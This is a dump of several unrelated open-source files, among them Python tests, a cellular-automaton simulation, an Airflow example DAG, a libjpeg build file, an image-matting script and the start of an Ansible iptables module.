self.partial_sum == other.partial_sum and
self.pad == other.pad and
self.dense_connectivity == other.dense_connectivity and
self.stride == other.stride and
self.copy_non_contiguous == other.copy_non_contiguous)
def __hash__(self):
msg = []
msg.append(self.__class__.__name__)
for val in (self.partial_sum, self.pad, self.dense_connectivity,
self.stride, self.copy_non_contiguous):
msg.append(str(val))
return hash(tuple(msg))
# Make sure the cuda_convnet library is compiled and up-to-date
def make_thunk(self, *args, **kwargs):
if not convnet_available():
raise RuntimeError('Could not compile cuda_convnet')
return super(BaseActs, self).make_thunk(*args, **kwargs)
# This is needed as otherwise DebugMode will consider that
# BaseActs.make_thunk do something else then the default code, and
# would duplicate verification.
theano.compile.debugmode.default_make_thunk.append(
get_unbound_function(BaseActs.make_thunk))
class UnimplementedError(Exception):
"""
Like NotImplementedError, but designed not to be caught and suppressed
by theano.
"""
|
tests/test_yandex.py
|
termim/geocoder
| 1,506 |
69958
|
# coding: utf8
import geocoder
location = 'Ottawa'
coordinates = {'lat': 41.005407, 'lng': 28.978349}
def test_yandex():
g = geocoder.yandex(location)
assert g.ok
def test_yandex_reverse():
g = geocoder.yandex(coordinates, method='reverse')
assert g.ok
def test_multi_results():
g = geocoder.yandex(location, maxRows=3)
assert len(g) == 3
|
ca-hostpathogen.py
|
RachidStat/PyCX
| 176 |
69972
|
<reponame>RachidStat/PyCX
import pycxsimulator
from pylab import *
width = 50
height = 50
initProb = 0.01
infectionRate = 0.85
regrowthRate = 0.15
def initialize():
global time, config, nextConfig
time = 0
config = zeros([height, width])
for x in range(width):
for y in range(height):
if random() < initProb:
state = 2
else:
state = 1
config[y, x] = state
nextConfig = zeros([height, width])
def observe():
cla()
imshow(config, vmin = 0, vmax = 2, cmap = cm.jet)
axis('image')
title('t = ' + str(time))
def update():
global time, config, nextConfig
time += 1
for x in range(width):
for y in range(height):
state = config[y, x]
if state == 0:
for dx in range(-1, 2):
for dy in range(-1, 2):
if config[(y+dy)%height, (x+dx)%width] == 1:
if random() < regrowthRate:
state = 1
elif state == 1:
for dx in range(-1, 2):
for dy in range(-1, 2):
if config[(y+dy)%height, (x+dx)%width] == 2:
if random() < infectionRate:
state = 2
else:
state = 0
nextConfig[y, x] = state
config, nextConfig = nextConfig, config
pycxsimulator.GUI().start(func=[initialize, observe, update])
|
caffe2/python/db_test.py
|
KevinKecc/caffe2
| 585 |
69973
|
# Copyright (c) 2016-present, Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from caffe2.python import workspace
import os
import tempfile
import unittest
class TestDB(unittest.TestCase):
def setUp(self):
handle, self.file_name = tempfile.mkstemp()
os.close(handle)
self.data = [
(
"key{}".format(i).encode("ascii"),
"value{}".format(i).encode("ascii")
)
for i in range(1, 10)
]
def testSimple(self):
db = workspace.C.create_db(
"minidb", self.file_name, workspace.C.Mode.write)
for key, value in self.data:
transaction = db.new_transaction()
transaction.put(key, value)
del transaction
del db # should close DB
db = workspace.C.create_db(
"minidb", self.file_name, workspace.C.Mode.read)
cursor = db.new_cursor()
data = []
while cursor.valid():
data.append((cursor.key(), cursor.value()))
cursor.next() # noqa: B305
del cursor
db.close() # test explicit db closer
self.assertEqual(data, self.data)
|
testing/example_scripts/fixtures/fill_fixtures/test_extend_fixture_conftest_module/conftest.py
|
markshao/pytest
| 9,225 |
69983
|
import pytest
@pytest.fixture
def spam():
return "spam"
|
tests/unit/lib/cookiecutter/test_question.py
|
torresxb1/aws-sam-cli
| 859 |
70027
|
from typing import List, Union, Dict
from unittest import TestCase
from unittest.mock import ANY, patch, Mock
from parameterized import parameterized
from samcli.lib.cookiecutter.question import Question, QuestionKind, Choice, Confirm, Info, QuestionFactory
class TestQuestion(TestCase):
_ANY_TEXT = "any text"
_ANY_KEY = "any key"
_ANY_OPTIONS = ["option1", "option2", "option3"]
_ANY_ANSWER = "any answer"
_ANY_NEXT_QUESTION_MAP = {
"option1": "key1",
"option2": "key2",
"option3": "key3",
}
_ANY_DEFAULT_NEXT_QUESTION_KEY = "default"
_ANY_KIND = QuestionKind.question
def setUp(self):
self.question = Question(
text=self._ANY_TEXT,
key=self._ANY_KEY,
default=self._ANY_ANSWER,
is_required=True,
allow_autofill=False,
next_question_map=self._ANY_NEXT_QUESTION_MAP,
default_next_question_key=self._ANY_DEFAULT_NEXT_QUESTION_KEY,
)
def get_question_with_default_from_cookiecutter_context_using_keypath(
self, key_path: List[Union[str, Dict]]
) -> Question:
return Question(
text=self._ANY_TEXT,
key=self._ANY_KEY,
default={"keyPath": key_path},
is_required=True,
next_question_map=self._ANY_NEXT_QUESTION_MAP,
default_next_question_key=self._ANY_DEFAULT_NEXT_QUESTION_KEY,
)
def test_creating_questions(self):
q = Question(text=self._ANY_TEXT, key=self._ANY_KEY)
self.assertEqual(q.text, self._ANY_TEXT)
self.assertEqual(q.key, self._ANY_KEY)
self.assertEqual(q.default_answer, "")
self.assertFalse(q.required)
self.assertEqual(q.next_question_map, {})
self.assertIsNone(q.default_next_question_key)
q = self.question
self.assertEqual(q.text, self._ANY_TEXT)
self.assertEqual(q.key, self._ANY_KEY)
self.assertEqual(q.default_answer, self._ANY_ANSWER)
self.assertTrue(q.required)
self.assertEqual(q.next_question_map, self._ANY_NEXT_QUESTION_MAP)
self.assertEqual(q.default_next_question_key, self._ANY_DEFAULT_NEXT_QUESTION_KEY)
def test_question_key_and_text_are_required(self):
with (self.assertRaises(TypeError)):
Question(text=self._ANY_TEXT)
with (self.assertRaises(TypeError)):
Question(key=self._ANY_KEY)
def test_get_next_question_key(self):
self.assertEqual(self.question.get_next_question_key("option1"), "key1")
self.assertEqual(self.question.get_next_question_key("option2"), "key2")
self.assertEqual(self.question.get_next_question_key("option3"), "key3")
self.assertEqual(self.question.get_next_question_key("any-option"), self._ANY_DEFAULT_NEXT_QUESTION_KEY)
self.question.set_default_next_question_key("new_default")
self.assertEqual(self.question.get_next_question_key(None), "new_default")
@patch("samcli.lib.cookiecutter.question.click")
def test_ask(self, mock_click):
mock_click.prompt.return_value = self._ANY_ANSWER
answer = self.question.ask({})
self.assertEqual(answer, self._ANY_ANSWER)
mock_click.prompt.assert_called_once_with(text=self.question.text, default=self.question.default_answer)
@patch("samcli.lib.cookiecutter.question.click")
def test_ask_resolves_from_cookiecutter_context(self, mock_click):
# Setup
expected_default_value = Mock()
previous_question_key = "this is a question"
previous_question_answer = "this is an answer"
context = {
"['x', 'this is an answer']": expected_default_value,
previous_question_key: previous_question_answer,
}
question = self.get_question_with_default_from_cookiecutter_context_using_keypath(
["x", {"valueOf": previous_question_key}]
)
# Trigger
question.ask(context=context)
# Verify
mock_click.prompt.assert_called_once_with(text=self.question.text, default=expected_default_value)
@patch("samcli.lib.cookiecutter.question.click")
def test_ask_resolves_from_cookiecutter_context_non_exist_key_path(self, mock_click):
# Setup
context = {}
question = self.get_question_with_default_from_cookiecutter_context_using_keypath(["y"])
# Trigger
question.ask(context=context)
# Verify
mock_click.prompt.assert_called_once_with(text=self.question.text, default=None)
def test_ask_resolves_from_cookiecutter_context_non_exist_question_key(self):
# Setup
expected_default_value = Mock()
previous_question_key = "this is a question"
previous_question_answer = "this is an answer"
context = {
"['x', 'this is an answer']": expected_default_value,
previous_question_key: previous_question_answer,
}
question = self.get_question_with_default_from_cookiecutter_context_using_keypath(
["x", {"valueOf": "non_exist_question_key"}]
)
# Trigger
with self.assertRaises(KeyError):
question.ask(context=context)
@parameterized.expand([("this should have been a list"), ([1],), ({},)])
def test_ask_resolves_from_cookiecutter_context_with_key_path_not_a_list(self, key_path):
# Setup
context = {}
question = self.get_question_with_default_from_cookiecutter_context_using_keypath(key_path)
# Trigger
with self.assertRaises(ValueError):
question.ask(context=context)
@parameterized.expand([({"keyPath123": Mock()},), ({"keyPath": [{"valueOf123": Mock()}]},)])
def test_ask_resolves_from_cookiecutter_context_with_default_object_missing_keys(self, default_object):
# Setup
context = {}
question = self.get_question_with_default_from_cookiecutter_context_using_keypath([])
question._default_answer = default_object
# Trigger
with self.assertRaises(KeyError):
question.ask(context=context)
def test_question_allow_autofill_with_default_value(self):
q = Question(text=self._ANY_TEXT, key=self._ANY_KEY, is_required=True, allow_autofill=True, default="123")
self.assertEquals("123", q.ask())
@patch("samcli.lib.cookiecutter.question.click")
def test_question_allow_autofill_without_default_value(self, click_mock):
answer_mock = click_mock.prompt.return_value = Mock()
q = Question(text=self._ANY_TEXT, key=self._ANY_KEY, is_required=True, allow_autofill=True)
self.assertEquals(answer_mock, q.ask())
class TestChoice(TestCase):
def setUp(self):
self.question = Choice(
text=TestQuestion._ANY_TEXT,
key=TestQuestion._ANY_KEY,
options=TestQuestion._ANY_OPTIONS,
default=TestQuestion._ANY_ANSWER,
is_required=True,
next_question_map=TestQuestion._ANY_NEXT_QUESTION_MAP,
default_next_question_key=TestQuestion._ANY_DEFAULT_NEXT_QUESTION_KEY,
)
def test_create_choice_question(self):
self.assertEqual(self.question.text, TestQuestion._ANY_TEXT)
self.assertEqual(self.question.key, TestQuestion._ANY_KEY)
self.assertEqual(self.question._options, TestQuestion._ANY_OPTIONS)
with (self.assertRaises(TypeError)):
Choice(key=TestQuestion._ANY_KEY, text=TestQuestion._ANY_TEXT)
with (self.assertRaises(ValueError)):
Choice(key=TestQuestion._ANY_KEY, text=TestQuestion._ANY_TEXT, options=None)
with (self.assertRaises(ValueError)):
Choice(key=TestQuestion._ANY_KEY, text=TestQuestion._ANY_TEXT, options=[])
def test_get_options_indexes_with_different_bases(self):
indexes = self.question._get_options_indexes()
self.assertEqual(indexes, [0, 1, 2])
indexes = self.question._get_options_indexes(base=1)
self.assertEqual(indexes, [1, 2, 3])
@patch("samcli.lib.cookiecutter.question.click.Choice")
@patch("samcli.lib.cookiecutter.question.click")
def test_ask(self, mock_click, mock_choice):
mock_click.prompt.return_value = 2
answer = self.question.ask({})
self.assertEqual(answer, TestQuestion._ANY_OPTIONS[1]) # we deduct one from user's choice (base 1 vs base 0)
mock_click.prompt.assert_called_once_with(
text="Choice",
default=self.question.default_answer,
show_choices=False,
type=ANY,
show_default=self.question.default_answer is not None,
)
mock_choice.assert_called_once_with(["1", "2", "3"])
class TestInfo(TestCase):
@patch("samcli.lib.cookiecutter.question.click")
def test_ask(self, mock_click):
q = Info(text=TestQuestion._ANY_TEXT, key=TestQuestion._ANY_KEY)
mock_click.echo.return_value = None
answer = q.ask({})
self.assertIsNone(answer)
mock_click.echo.assert_called_once_with(message=q.text)
class TestConfirm(TestCase):
@patch("samcli.lib.cookiecutter.question.click")
def test_ask(self, mock_click):
q = Confirm(text=TestQuestion._ANY_TEXT, key=TestQuestion._ANY_KEY)
mock_click.confirm.return_value = True
answer = q.ask({})
self.assertTrue(answer)
mock_click.confirm.assert_called_once_with(text=q.text)
class TestQuestionFactory(TestCase):
def test_there_is_a_handler_for_each_question_kind(self):
question_json = {"key": TestQuestion._ANY_KEY, "question": TestQuestion._ANY_TEXT, "options": ["a", "b"]}
for kind in QuestionKind:
question_json["kind"] = kind.name
q = QuestionFactory.create_question_from_json(question_json)
expected_type = QuestionFactory.question_classes[kind]
self.assertTrue(isinstance(q, expected_type))
|
airflow/providers/amazon/aws/example_dags/example_salesforce_to_s3.py
|
ChaseKnowlden/airflow
| 15,947 |
70070
|
<gh_stars>1000+
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
This is a basic example DAG for using `SalesforceToS3Operator` to retrieve Salesforce customer
data and upload to an S3 bucket.
"""
from datetime import datetime
from airflow import DAG
from airflow.providers.amazon.aws.operators.s3_copy_object import S3CopyObjectOperator
from airflow.providers.amazon.aws.operators.s3_delete_objects import S3DeleteObjectsOperator
from airflow.providers.amazon.aws.transfers.salesforce_to_s3 import SalesforceToS3Operator
BASE_PATH = "salesforce/customers"
FILE_NAME = "customer_daily_extract_{{ ds_nodash }}.csv"
with DAG(
dag_id="example_salesforce_to_s3_transfer",
schedule_interval="@daily",
start_date=datetime(2021, 7, 8),
catchup=False,
default_args={"retries": 1, "aws_conn_id": "s3"},
tags=["example"],
default_view="graph",
) as dag:
# [START howto_operator_salesforce_to_s3_transfer]
upload_salesforce_data_to_s3_landing = SalesforceToS3Operator(
task_id="upload_salesforce_data_to_s3",
salesforce_query="SELECT Id, Name, Company, Phone, Email, LastModifiedDate, IsActive FROM Customers",
s3_bucket_name="landing-bucket",
s3_key=f"{BASE_PATH}/{FILE_NAME}",
salesforce_conn_id="salesforce",
replace=True,
)
# [END howto_operator_salesforce_to_s3_transfer]
date_prefixes = "{{ execution_date.strftime('%Y/%m/%d') }}"
store_to_s3_data_lake = S3CopyObjectOperator(
task_id="store_to_s3_data_lake",
source_bucket_key=upload_salesforce_data_to_s3_landing.output,
dest_bucket_name="data_lake",
dest_bucket_key=f"{BASE_PATH}/{date_prefixes}/{FILE_NAME}",
)
delete_data_from_s3_landing = S3DeleteObjectsOperator(
task_id="delete_data_from_s3_landing",
bucket=upload_salesforce_data_to_s3_landing.s3_bucket_name,
keys=upload_salesforce_data_to_s3_landing.s3_key,
)
store_to_s3_data_lake >> delete_data_from_s3_landing
# Task dependencies created via `XComArgs`:
# upload_salesforce_data_to_s3_landing >> store_to_s3_data_lake
|
deps/libjpeg/libjpeg.gyp
|
jiabinf/node-phash
| 131 |
70071
|
{
'includes': [ '../common.gyp' ],
'targets': [
{
'target_name': 'libjpeg',
'type': 'static_library',
'include_dirs': [
'.',
],
'sources': [
'ckconfig.c',
'jcapimin.c',
'jcapistd.c',
'jccoefct.c',
'jccolor.c',
'jcdctmgr.c',
'jchuff.c',
'jcinit.c',
'jcmainct.c',
'jcmarker.c',
'jcmaster.c',
'jcomapi.c',
'jcparam.c',
'jcphuff.c',
'jcprepct.c',
'jcsample.c',
'jctrans.c',
'jdapimin.c',
'jdapistd.c',
'jdatadst.c',
'jdatasrc.c',
'jdcoefct.c',
'jdcolor.c',
'jddctmgr.c',
'jdhuff.c',
'jdinput.c',
'jdmainct.c',
'jdmarker.c',
'jdmaster.c',
'jdmerge.c',
'jdphuff.c',
'jdpostct.c',
'jdsample.c',
'jdtrans.c',
'jerror.c',
'jfdctflt.c',
'jfdctfst.c',
'jfdctint.c',
'jidctflt.c',
'jidctfst.c',
'jidctint.c',
'jidctred.c',
'jmemansi.c',
#'jmemdos.c',
#'jmemmac.c',
'jmemmgr.c',
#'jmemname.c',
#'jmemnobs.c',
'jquant1.c',
'jquant2.c',
'jutils.c',
],
},
]
}
|
inference/inference_matting.py
|
spy14414/facexlib
| 164 |
70078
|
import argparse
import cv2
import numpy as np
import torch.nn.functional as F
from torchvision.transforms.functional import normalize
from facexlib.matting import init_matting_model
from facexlib.utils import img2tensor
def main(args):
modnet = init_matting_model()
# read image
img = cv2.imread(args.img_path) / 255.
# unify image channels to 3
if len(img.shape) == 2:
img = img[:, :, None]
if img.shape[2] == 1:
img = np.repeat(img, 3, axis=2)
elif img.shape[2] == 4:
img = img[:, :, 0:3]
img_t = img2tensor(img, bgr2rgb=True, float32=True)
normalize(img_t, (0.5, 0.5, 0.5), (0.5, 0.5, 0.5), inplace=True)
img_t = img_t.unsqueeze(0).cuda()
# resize image for input
_, _, im_h, im_w = img_t.shape
ref_size = 512
if max(im_h, im_w) < ref_size or min(im_h, im_w) > ref_size:
if im_w >= im_h:
im_rh = ref_size
im_rw = int(im_w / im_h * ref_size)
elif im_w < im_h:
im_rw = ref_size
im_rh = int(im_h / im_w * ref_size)
else:
im_rh = im_h
im_rw = im_w
im_rw = im_rw - im_rw % 32
im_rh = im_rh - im_rh % 32
img_t = F.interpolate(img_t, size=(im_rh, im_rw), mode='area')
# inference
_, _, matte = modnet(img_t, True)
# resize and save matte
matte = F.interpolate(matte, size=(im_h, im_w), mode='area')
matte = matte[0][0].data.cpu().numpy()
cv2.imwrite(args.save_path, (matte * 255).astype('uint8'))
# get foreground
matte = matte[:, :, None]
foreground = img * matte + np.full(img.shape, 1) * (1 - matte)
cv2.imwrite(args.save_path.replace('.png', '_fg.png'), foreground * 255)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--img_path', type=str, default='assets/test.jpg')
parser.add_argument('--save_path', type=str, default='test_matting.png')
args = parser.parse_args()
main(args)
|
library/iptables.py
|
pgraziano/ursula
| 193 |
70085
|
<reponame>pgraziano/ursula<filename>library/iptables.py<gh_stars>100-1000
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2015, <NAME> <<EMAIL>>
#
# This file is part of Ansible
#
# This module is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This software is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this software. If not, see <http://www.gnu.org/licenses/>.
BINS = dict(
ipv4='iptables',
ipv6='ip6tables',
)
DOCUMENTATION = '''
---
module: iptables
short_description: Modify the systems iptables
requirements: []
version_added: "2.0"
author: <NAME> (@LinusU) <<EMAIL>>
description:
- Iptables is used to set up, maintain, and inspect the tables of IP packet
filter rules in the Linux kernel. This module does not handle the saving
and/or loading of rules, but rather only manipulates the current rules
that are present in memory. This is the same as the behaviour of the
"iptables" and "ip6tables" command which this module uses internally.
notes:
- This module just deals with individual rules. If you need advanced
chaining of rules the recommended way is to template the iptables restore
file.
options:
table:
description:
- This option specifies the packet matching table which the command
should operate on. If the kernel is configured with automatic module
loading, an attempt will be made to load the appropriate module for
that table if it is not already there.
required: false
default: filter
choices: [ "filter", "nat", "mangle", "raw", "security" ]
state:
description:
- Whether the rule should be absent or present.
required: false
default: present
choices: [ "present", "absent" ]
action:
version_added: "2.2"
description:
- Whether the rule should be appended at the bottom or inserted at the
top. If the rule already exists the chain won't be modified.
required: false
default: append
choices: [ "append", "insert" ]
ip_version:
description:
- Which version of the IP protocol this rule should apply to.
required: false
default: ipv4
choices: [ "ipv4", "ipv6" ]
chain:
description:
- "Chain to operate on. This option can either be the name of a user
defined chain or any of the builtin chains: 'INPUT', 'FORWARD',
'OUTPUT', 'PREROUTING', 'POSTROUTING', 'SECMARK', 'CONNSECMARK'."
required: false
protocol:
description:
- The protocol of the rule or of the packet to check. The specified
protocol can be one of tcp, udp, udplite, icmp, esp, ah, sctp or the
special keyword "all", or it can be a numeric value, representing one
of these protocols or a different one. A protocol name from
/etc/protocols is also allowed. A "!" argument before the protocol
inverts the test. The number zero is equivalent to all. "all" will
match with all protocols and is taken as default when this option is
omitted.
required: false
default: null
source:
description:
- Source specification. Address can be either a network name,
a hostname, a network IP address (with /mask), or a plain IP address.
Hostnames will be resolved once only, before the rule is submitted to
the kernel. Please note that specifying any name to be resolved with
a remote query such as DNS is a really bad idea. The mask can be
either a network mask or a plain number, specifying the number of 1's
at the left side of the network mask. Thus, a mask of 24 is equivalent
to 255.255.255.0. A "!" argument before the address specification
inverts the sense of the address.
required: false
default: null
destination:
description:
- Destination specification. Address can be either a network name,
a hostname, a network IP address (with /mask), or a plain IP address.
Hostnames will be resolved once only, before the rule is submitted to
the kernel. Please note that specifying any name to be resolved with
a remote query such as DNS is a really bad idea. The mask can be
either a network mask or a plain number, specifying the number of 1's
at the left side of the network mask. Thus, a mask of 24 is equivalent
to 255.255.255.0. A "!" argument before the address specification
inverts the sense of the address.
required: false
default: null
match:
description:
- Specifies a match to use, that is, an extension module that tests for
a specific property. The set of matches make up the condition under
which a target is invoked. Matches are evaluated first to last if
specified as an array and work in short-circuit fashion, i.e. if one
extension yields false, evaluation will stop.
required: false
default: []
jump:
description:
- This specifies the target of the rule; i.e., what to do if the packet
matches it. The target can be a user-defined chain (other than the one
this rule is in), one of the special builtin targets which decide the
fate of the packet immediately, or an extension (see EXTENSIONS
below). If this option is omitted in a rule (and the goto paramater
is not used), then matching the rule will have no effect on the
packet's fate, but the counters on the rule will be incremented.
required: false
default: null
goto:
description:
- This specifies that the processing should continue in a user specified
chain. Unlike the jump argument return will not continue processing in
this chain but instead in the chain that called us via jump.
required: false
default: null
in_interface:
description:
- Name of an interface via which a packet was received (only for packets
entering the INPUT, FORWARD and PREROUTING chains). When the "!"
argument is used before the interface name, the sense is inverted. If
the interface name ends in a "+", then any interface which begins with
this name will match. If this option is omitted, any interface name
will match.
required: false
default: null
out_interface:
description:
- Name of an interface via which a packet is going to be sent (for
packets entering the FORWARD, OUTPUT and POSTROUTING chains). When the
"!" argument is used before the interface name, the sense is inverted.
If the interface name ends in a "+", then any interface which begins
with this name will match. If this option is omitted, any interface
name will match.
required: false
default: null
fragment:
description:
- This means that the rule only refers to second and further fragments
of fragmented packets. Since there is no way to tell the source or
destination ports of such a packet (or ICMP type), such a packet will
not match any rules which specify them. When the "!" argument precedes
fragment argument, the rule will only match head fragments, or
unfragmented packets.
required: false
default: null
set_counters:
description:
- This enables the administrator to initialize the packet and byte
counters of a rule (during INSERT, APPEND, REPLACE operations).
required: false
default: null
source_port:
description:
- "Source port or port range specification. This can either be a service
name or a port number. An inclusive range can also be specified, using
the format first:last. If the first port is omitted, '0' is assumed;
if the last is omitted, '65535' is assumed. If the first port is
greater than the second one they will be swapped."
required: false
default: null
destination_port:
description:
- "Destination port or port range specification. This can either be
a service name or a port number. An inclusive range can also be
specified, using the format first:last. If the first port is omitted,
'0' is assumed; if the last is omitted, '65535' is assumed. If the
first port is greater than the second one they will be swapped."
required: false
default: null
to_ports:
description:
- "This specifies a destination port or range of ports to use: without
this, the destination port is never altered. This is only valid if the
rule also specifies one of the following protocols: tcp, udp, dccp or
sctp."
required: false
default: null
to_destination:
version_added: "2.1"
description:
- "This specifies a destination address to use with DNAT: without
this, the destination address is never altered."
required: false
default: null
to_source:
version_added: "2.2"
description:
- "This specifies a source address to use with SNAT: without
this, the source address is never altered."
required: false
default: null
set_dscp_mark:
version_added: "2.1"
description:
- "This allows specifying a DSCP mark to be added to packets.
It takes either an integer or hex value. Mutually exclusive with
C(set_dscp_mark_class)."
required: false
default: null
set_dscp_mark_class:
version_added: "2.1"
description:
- "This allows specifying a predefined DiffServ class which will be
translated to the corresponding DSCP mark. Mutually exclusive with
C(set_dscp_mark)."
required: false
default: null
comment:
description:
- "This specifies a comment that will be added to the rule"
required: false
default: null
ctstate:
description:
- "ctstate is a list of the connection states to match in the conntrack
module.
Possible states are: 'INVALID', 'NEW', 'ESTABLISHED', 'RELATED',
'UNTRACKED', 'SNAT', 'DNAT'"
required: false
default: []
limit:
description:
- "Specifies the maximum average number of matches to allow per second.
The number can specify units explicitly, using `/second', `/minute',
`/hour' or `/day', or parts of them (so `5/second' is the same as
`5/s')."
required: false
default: null
limit_burst:
version_added: "2.1"
description:
- "Specifies the maximum burst before the above limit kicks in."
required: false
default: null
uid_owner:
version_added: "2.1"
description:
- "Specifies the UID or username to use in match by owner rule."
required: false
reject_with:
version_added: "2.1"
description:
- "Specifies the error packet type to return while rejecting."
required: false
icmp_type:
version_added: "2.2"
description:
- "This allows specification of the ICMP type, which can be a numeric
ICMP type, type/code pair, or one of the ICMP type names shown by the
command 'iptables -p icmp -h'"
required: false
flush:
version_added: "2.2"
description:
- "Flushes the specified table and chain of all rules. If no chain is
specified then the entire table is purged. Ignores all other
parameters."
required: false
policy:
version_added: "2.2"
description:
- "Set the policy for the chain to the given target. Valid targets are
ACCEPT, DROP, QUEUE, RETURN. Only built in chains can have policies.
This parameter requires the chain parameter. Ignores all other
parameters."
'''
EXAMPLES = '''
# Block specific IP
- iptables: chain=INPUT source=8.8.8.8 jump=DROP
become: yes
# Forward port 80 to 8600
- iptables: table=nat chain=PREROUTING in_interface=eth0 protocol=tcp match=tcp destination_port=80 jump=REDIRECT to_ports=8600 comment="Redirect web traffic to port 8600"
become: yes
# Allow related and established connections
- iptables: chain=INPUT ctstate=ESTABLISHED,RELATED jump=ACCEPT
become: yes
# Tag all outbound tcp packets with DSCP mark 8
- iptables: chain=OUTPUT jump=DSCP table=mangle set_dscp_mark=8 protocol=tcp
# Tag all outbound tcp packets with DSCP DiffServ class CS1
- iptables: chain=OUTPUT jump=DSCP table=mangle set_dscp_mark_class=CS1 protocol=tcp
'''
def append_param(rule, param, flag, is_list):
if is_list:
for item in param:
append_param(rule, item, flag, False)
else:
if param is not None:
rule.extend([flag, param])
def append_csv(rule, param, flag):
if param:
rule.extend([flag, ','.join(param)])
def append_match(rule, param, match):
if param:
rule.extend(['-m', match])
def append_jump(rule, param, jump):
if param:
rule.extend(['-j', jump])
def construct_rule(params):
rule = []
append_param(rule, params['protocol'], '-p', False)
append_param(rule, params['source'], '-s', False)
append_param(rule, params['destination'], '-d', False)
append_param(rule, params['match'], '-m', True)
append_param(rule, params['jump'], '-j', False)
append_param(rule, params['to_destination'], '--to-destination', False)
append_param(rule, params['to_source'], '--to-source', False)
append_param(rule, params['goto'], '-g', False)
append_param(rule, params['in_interface'], '-i', False)
append_param(rule, params['out_interface'], '-o', False)
append_param(rule, params['fragment'], '-f', False)
append_param(rule, params['set_counters'], '-c', False)
append_param(rule, params['source_port'], '--source-port', False)
append_param(rule, params['destination_port'], '--destination-port', False)
append_param(rule, params['to_ports'], '--to-ports', False)
append_param(rule, params['set_dscp_mark'], '--set-dscp', False)
append_param(
rule,
params['set_dscp_mark_class'],
'--set-dscp-class',
False)
append_match(rule, params['comment'], 'comment')
append_param(rule, params['comment'], '--comment', False)
append_match(rule, params['ctstate'], 'state')
append_csv(rule, params['ctstate'], '--state')
append_match(rule, params['limit'] or params['limit_burst'], 'limit')
append_param(rule, params['limit'], '--limit', False)
append_param(rule, params['limit_burst'], '--limit-burst', False)
append_match(rule, params['uid_owner'], 'owner')
append_param(rule, params['uid_owner'], '--uid-owner', False)
append_jump(rule, params['reject_with'], 'REJECT')
append_param(rule, params['reject_with'], '--reject-with', False)
append_param(rule, params['icmp_type'], '--icmp-type', False)
return rule
def push_arguments(iptables_path, action, params, make_rule=True):
cmd = [iptables_path]
cmd.extend(['-t', params['table']])
cmd.extend([action, params['chain']])
if make_rule:
cmd.extend(construct_rule(params))
return cmd
def check_present(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-C', params)
rc, _, __ = module.run_command(cmd, check_rc=False)
return (rc == 0)
def append_rule(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-A', params)
module.run_command(cmd, check_rc=True)
def insert_rule(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-I', params)
module.run_command(cmd, check_rc=True)
def remove_rule(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-D', params)
module.run_command(cmd, check_rc=True)
def flush_table(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-F', params, make_rule=False)
module.run_command(cmd, check_rc=True)
def set_chain_policy(iptables_path, module, params):
cmd = push_arguments(iptables_path, '-P', params, make_rule=False)
cmd.append(params['policy'])
module.run_command(cmd, check_rc=True)
def main():
module = AnsibleModule(
supports_check_mode=True,
argument_spec=dict(
table=dict(
required=False,
default='filter',
choices=['filter', 'nat', 'mangle', 'raw', 'security']),
state=dict(
required=False,
default='present',
choices=['present', 'absent']),
action=dict(
required=False,
default='append',
type='str',
choices=['append', 'insert']),
ip_version=dict(
required=False,
default='ipv4',
choices=['ipv4', 'ipv6']),
chain=dict(required=False, default=None, type='str'),
protocol=dict(required=False, default=None, type='str'),
source=dict(required=False, default=None, type='str'),
to_source=dict(required=False, default=None, type='str'),
destination=dict(required=False, default=None, type='str'),
to_destination=dict(required=False, default=None, type='str'),
match=dict(required=False, default=[], type='list'),
jump=dict(required=False, default=None, type='str'),
goto=dict(required=False, default=None, type='str'),
in_interface=dict(required=False, default=None, type='str'),
out_interface=dict(required=False, default=None, type='str'),
fragment=dict(required=False, default=None, type='str'),
set_counters=dict(required=False, default=None, type='str'),
source_port=dict(required=False, default=None, type='str'),
destination_port=dict(required=False, default=None, type='str'),
to_ports=dict(required=False, default=None, type='str'),
set_dscp_mark=dict(required=False, default=None, type='str'),
set_dscp_mark_class=dict(required=False, default=None, type='str'),
comment=dict(required=False, default=None, type='str'),
ctstate=dict(required=False, default=[], type='list'),
limit=dict(required=False, default=None, type='str'),
limit_burst=dict(required=False, default=None, type='str'),
uid_owner=dict(required=False, default=None, type='str'),
reject_with=dict(required=False, default=None, type='str'),
icmp_type=dict(required=False, default=None, type='str'),
flush=dict(required=False, default=False, type='bool'),
policy=dict(
required=False,
default=None,
type='str',
choices=['ACCEPT', 'DROP', 'QUEUE', 'RETURN']),
),
mutually_exclusive=(
['set_dscp_mark', 'set_dscp_mark_class'],
['flush', 'policy'],
),
)
args = dict(
changed=False,
failed=False,
ip_version=module.params['ip_version'],
table=module.params['table'],
chain=module.params['chain'],
flush=module.params['flush'],
rule=' '.join(construct_rule(module.params)),
state=module.params['state'],
)
ip_version = module.params['ip_version']
iptables_path = module.get_bin_path(BINS[ip_version], True)
